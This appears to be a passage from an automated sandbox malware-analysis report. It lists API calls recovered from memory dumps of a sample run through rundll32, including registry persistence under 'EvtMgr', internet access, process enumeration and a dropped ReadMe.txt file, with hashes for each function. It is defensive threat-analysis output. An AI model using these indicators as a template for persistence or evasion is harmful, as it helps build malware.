                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileFindFirstSleeplstrcpy
                                                • String ID: C:\Program Files
                                                • API String ID: 187370985-1387799010
                                                • Opcode ID: 104c4d2efdd1e2322e4b23a01710967e339c577f5a1987c4c7f9844ac907495e
                                                • Instruction ID: 61b073742c814ce492014a967659e3b424d997019ce0857d6221e672e47afb5b
                                                • Opcode Fuzzy Hash: 104c4d2efdd1e2322e4b23a01710967e339c577f5a1987c4c7f9844ac907495e
                                                • Instruction Fuzzy Hash: 3E113CB88057559BF300DF69ECD15477BE0FB84684F008929E85587316E735D649CBA3
                                                Function 033805A9 Relevance: 2.6, APIs: 2, Instructions: 76memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03380625
                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03380658
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.1697705613.0000000003380000.00000040.00001000.00020000.00000000.sdmp, Offset: 03380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_3380000_rundll32.jbxd
                                                Similarity
                                                • API ID: Virtual$AllocFree
                                                • String ID:
                                                • API String ID: 2087232378-0
                                                • Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                                • Instruction ID: ad8fccde4c0dc4423abfe53a4f7b411d98761f7a81d8181a87cfba26fd0598ee
                                                • Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                                • Instruction Fuzzy Hash: 6B215775A01319BFDB00DFA4CC80BEEFBF9FB44294F208162E910A2280E7708A599B54
                                                Function 10004C20 Relevance: 1.5, APIs: 1, Instructions: 20registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyExA.KERNEL32(?,?,?,?,?,?,?,?,?,1000906E,80000001,00000000,?), ref: 10004C4D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 150bd87b14d3b07de01cf752c73747d879c117e8bc87c6aeaf82a9217c82b333
                                                • Instruction ID: 4b958377b8f6819c9cb17a5be3b00e8c41f947a8e294ec63b8cfc4c184e4756b
                                                • Opcode Fuzzy Hash: 150bd87b14d3b07de01cf752c73747d879c117e8bc87c6aeaf82a9217c82b333
                                                • Instruction Fuzzy Hash: 24E00AB5218601AF9604CF49D894C1BB3F9BBCD700F10CA0CB599C3254D630E806CB62
                                                Function 10004B40 Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileA.KERNEL32(00000003,00000003,00000003,00000003,00000003,40000000,?,1000BBE4,c:\agtve\ReadMe.txt,40000000,00000003,00000000,00000004,00000080,00000000), ref: 10004B63
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 9c96cc994586578f316554800c59ad217e0e27d90daea8609a1871e27ba07cfa
                                                • Instruction ID: b1acddf2ec3e37a5d5dcdfaa1de533b66f54714f002444a5cde71aefe8c48c35
                                                • Opcode Fuzzy Hash: 9c96cc994586578f316554800c59ad217e0e27d90daea8609a1871e27ba07cfa
                                                • Instruction Fuzzy Hash: 85D0A2B6618212AF9644CF98EA94D1BB7E9ABCCB00F10890CB585D3254D670EC49CB73
                                                Function 10004C70 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,74DF0F10,?,1000AAC6,?,74DF0F10,00000000,000000FF,?,00000104,?,?,?), ref: 10004C8E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: QueryValue
                                                • String ID:
                                                • API String ID: 3660427363-0
                                                • Opcode ID: 0fccdda7f6bc64189a44bad6c102572695505bb3016eb6268000810ac36e3e21
                                                • Instruction ID: ebaf1be8d889f364eaf5267f0a81e264a20874aa47e59fc56bef3f2ec861e65a
                                                • Opcode Fuzzy Hash: 0fccdda7f6bc64189a44bad6c102572695505bb3016eb6268000810ac36e3e21
                                                • Instruction Fuzzy Hash: 13D0BCB5618742AF9744CF58D994C3BB7E9BBC8611F148D0CB59583254D730E849CB62
                                                Function 10004CC0 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegSetValueExA.KERNEL32(?,?,?,?,?,?,100090C2,?,EvtMgr,00000000,00000001,?), ref: 10004CDE
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Value
                                                • String ID:
                                                • API String ID: 3702945584-0
                                                • Opcode ID: acb95854f7ebfe107d9ad6fa5725a02533b256ecd7490f7e051e36ee0d353bb8
                                                • Instruction ID: f56af968e5fe79637af5710c571a5d5bb89e367fb5f00816f0ff50808f0d9261
                                                • Opcode Fuzzy Hash: acb95854f7ebfe107d9ad6fa5725a02533b256ecd7490f7e051e36ee0d353bb8
                                                • Instruction Fuzzy Hash: 96D06CF5208342AF9704CF48D984C3BB3E9BBC8600F048D0CB59683210C734E808CB62
                                                Function 10004960 Relevance: 1.5, APIs: 1, Instructions: 14networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,?,00000000), ref: 1000497E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: InternetOpen
                                                • String ID:
                                                • API String ID: 2038078732-0
                                                • Opcode ID: d5fa67fd77fc08087aa00dd8c2a10ade798770437726e994f987ef2aecb902aa
                                                • Instruction ID: 24a332b1a684adcd34ca85a3606a9ea4ce0bf4268c39e93a7a2cc773aab27df0
                                                • Opcode Fuzzy Hash: d5fa67fd77fc08087aa00dd8c2a10ade798770437726e994f987ef2aecb902aa
                                                • Instruction Fuzzy Hash: E5D0BCB5618342AF9704CF98D994D3BB7E9BBC8610F148D0CB59983254D730E849CB62
                                                Function 10004CA0 Relevance: 1.5, APIs: 1, Instructions: 12registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExA.KERNEL32(?,?,?,?,00020019,1000AA61,80000002,1000B947,00000000,00020019,?,?,?,74DF0F00), ref: 10004CB9
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: adf75bf85e2af3ddcfeaeaac0d99d0987dcd00327a37493a0bb918ee9644fffb
                                                • Instruction ID: 50e6064c7111890aa9a03aac3f3b9a89cc62f2ac42a6c8a70e0450a1f82d0af1
                                                • Opcode Fuzzy Hash: adf75bf85e2af3ddcfeaeaac0d99d0987dcd00327a37493a0bb918ee9644fffb
                                                • Instruction Fuzzy Hash: 0ED0C2B9218201AF9604CB54D994C2BB3E9ABC8711F10C90CB59983240C630EC04CB22
                                                Function 10004940 Relevance: 1.5, APIs: 1, Instructions: 12networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetOpenA.WININET(?,?,?,?,?), ref: 10004959
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: InternetOpen
                                                • String ID:
                                                • API String ID: 2038078732-0
                                                • Opcode ID: 6e00a86521e39f70200af91c0e782be9a776f46f6143d79cb541def31d59b899
                                                • Instruction ID: c57f2b60c8454c0bab147a503f00b76e005ba1046bd805275401aac779bd7d3b
                                                • Opcode Fuzzy Hash: 6e00a86521e39f70200af91c0e782be9a776f46f6143d79cb541def31d59b899
                                                • Instruction Fuzzy Hash: B4D0C5F9218201AFAA08CB98D994D2BB3E9ABC8711F00C90CB5A983240C634E805CB22
                                                Function 10004A80 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNEL32(00000080,00000080,00000004,00000000,1000BBF2,00000000,00000000,00000000,00000002,c:\agtve\ReadMe.txt,40000000,00000003,00000000,00000004,00000080,00000000), ref: 10004A94
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 307ad37cac304fa9a49160dccf8dcea02f02b058180b3fe4503caacfb64423ba
                                                • Instruction ID: 6891ee5e46bc57ffaf97ee454a71f1b365b33a6ff264fc0d3ac975428b6807b6
                                                • Opcode Fuzzy Hash: 307ad37cac304fa9a49160dccf8dcea02f02b058180b3fe4503caacfb64423ba
                                                • Instruction Fuzzy Hash: C1C002B9608301BFDA04CB54C888D6BB7E9EBC8340F00C90CF999C3210C674E880CB22
                                                Function 100048E0 Relevance: 1.5, APIs: 1, Instructions: 8synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateMutexA.KERNEL32(?,?,?,10008DF5), ref: 100048EF
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CreateMutex
                                                • String ID:
                                                • API String ID: 1964310414-0
                                                • Opcode ID: c3fc0ddbfa11ab48aec40ca6578fb8896d180a8c1cb42ca496ab622c98b4a772
                                                • Instruction ID: 2243b4d894195d018e8de0dd45e47365024512defcc99eb91dc30795441f5685
                                                • Opcode Fuzzy Hash: c3fc0ddbfa11ab48aec40ca6578fb8896d180a8c1cb42ca496ab622c98b4a772
                                                • Instruction Fuzzy Hash: 07C04C78104211BFDA04CB14C984C2BB7A9EBC4610F00C90CB89582214C630EC80DB51
                                                Function 10004B10 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetShortPathNameA.KERNEL32(?,?,?), ref: 10004B1F
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: NamePathShort
                                                • String ID:
                                                • API String ID: 1295925010-0
                                                • Opcode ID: 9f5cfde4427fa5097d0c1c0217ac771adfd46cf51cf8a9311dee08de603acc45
                                                • Instruction ID: 5a9084a55f8d2033a769c09c7aad229fb9ca7a40d13baa6944edb8cb5aec9d82
                                                • Opcode Fuzzy Hash: 9f5cfde4427fa5097d0c1c0217ac771adfd46cf51cf8a9311dee08de603acc45
                                                • Instruction Fuzzy Hash: B2C048B8208200BFEA04CB10C988C3BB7E9EBC9610F00C90CF88983210C670EC40DB22
                                                Function 100014A0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(04C26F98), ref: 100014B6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 3fdfd97ca8c23d8f0530906f45af778a22596f4696536d932bba85b17bd97f22
                                                • Instruction ID: 725f2ff9a6cedf6bbb67758c43434fa7ac3ec696b7c5dfde3be615a84814b02d
                                                • Opcode Fuzzy Hash: 3fdfd97ca8c23d8f0530906f45af778a22596f4696536d932bba85b17bd97f22
                                                • Instruction Fuzzy Hash: 75B092B0801520CBEB02CB6088C840B7674A30C2423108205FA10C3228EB34D0009B50
                                                Function 100014D0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(04C25F90), ref: 100014E6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: a7f2342bc6644b56cfd7610f8ddd93b81e28e0250071e72ee512f0feba057ba5
                                                • Instruction ID: 35b88f928cdc07da968701179a6f33f0e97a6378d6662f65b823b83c2d3665f9
                                                • Opcode Fuzzy Hash: a7f2342bc6644b56cfd7610f8ddd93b81e28e0250071e72ee512f0feba057ba5
                                                • Instruction Fuzzy Hash: A8B092B4900520CBEA12CBA0888840B76A4B30C2813008205F920C3229EB30D000DB10
                                                Function 10004D10 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                APIs
                                                • Process32First.KERNEL32(00000000,00000000), ref: 10004D1A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: FirstProcess32
                                                • String ID:
                                                • API String ID: 2623510744-0
                                                • Opcode ID: 06074555a490e452e0c33516115e8def1b160905719b86e6ca60f0acd3be714b
                                                • Instruction ID: 43577a1182ef3f798ff4e4d470cfcf9041e9be16eb90189a2022d36134155a7f
                                                • Opcode Fuzzy Hash: 06074555a490e452e0c33516115e8def1b160905719b86e6ca60f0acd3be714b
                                                • Instruction Fuzzy Hash: 51B09275504200ABD214DB10C994C2BB7A8AB94301B00C809B48A82210C630D840CB21
                                                Function 10001530 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(04C21050), ref: 10001546
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 2558f847f3bd71bba4265f3a4f9d7399b42694cb2fe8554de869f675100a772c
                                                • Instruction ID: 0f05b9913dce9b7b17749fc1586e01a4e82b3307b98390648e12e362a5b60e72
                                                • Opcode Fuzzy Hash: 2558f847f3bd71bba4265f3a4f9d7399b42694cb2fe8554de869f675100a772c
                                                • Instruction Fuzzy Hash: 9DB092F0800A20CBFA128B608CC84473774A34C242320C002F911C7224E730C154DB20
                                                Function 10004D30 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                APIs
                                                • Process32Next.KERNEL32(?,00000000), ref: 10004D3A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: NextProcess32
                                                • String ID:
                                                • API String ID: 1850201408-0
                                                • Opcode ID: fb3d1d2fe4f58d77b62947db14fcf388f89edba650b3a7b099c6c960cb254603
                                                • Instruction ID: 432f843a027fd044bab358c4309ee591cd41ce3803a4c335f332d4fec9f9d121
                                                • Opcode Fuzzy Hash: fb3d1d2fe4f58d77b62947db14fcf388f89edba650b3a7b099c6c960cb254603
                                                • Instruction Fuzzy Hash: EDB092B5104200ABD214DB10C984C2BB7A8ABD4301B008808B48A82110C634D880CB21
                                                Function 10001590 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(033FD0A0), ref: 100015A6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: b8e4ff15c4138358dcbf467bb1e805bc5a866f0c9e2c71367f6b70752848133d
                                                • Instruction ID: 22283fd24f107b37298acc13f8db5db648e85e1336fc49587faefca2ed5f0806
                                                • Opcode Fuzzy Hash: b8e4ff15c4138358dcbf467bb1e805bc5a866f0c9e2c71367f6b70752848133d
                                                • Instruction Fuzzy Hash: 24B092B0850924CBF612CB608CC840B3774A78C2423408201F915C7225E730C010DB10
                                                Function 10001620 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(033FA088), ref: 10001636
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 854aff89b505d9f21911f8c1ba55fbf1c8cc102515e225042a2c32485127d58f
                                                • Instruction ID: 6451e9acda46e7ae8c67071bb3abdc211bd966f3bbc7d4a56457b69d03684d62
                                                • Opcode Fuzzy Hash: 854aff89b505d9f21911f8c1ba55fbf1c8cc102515e225042a2c32485127d58f
                                                • Instruction Fuzzy Hash: B2B092B09016248BEB12CF608C8844B3764A30C2413448405F920C3228E734C008DB10
                                                Function 100016B0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(033F7070), ref: 100016C6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
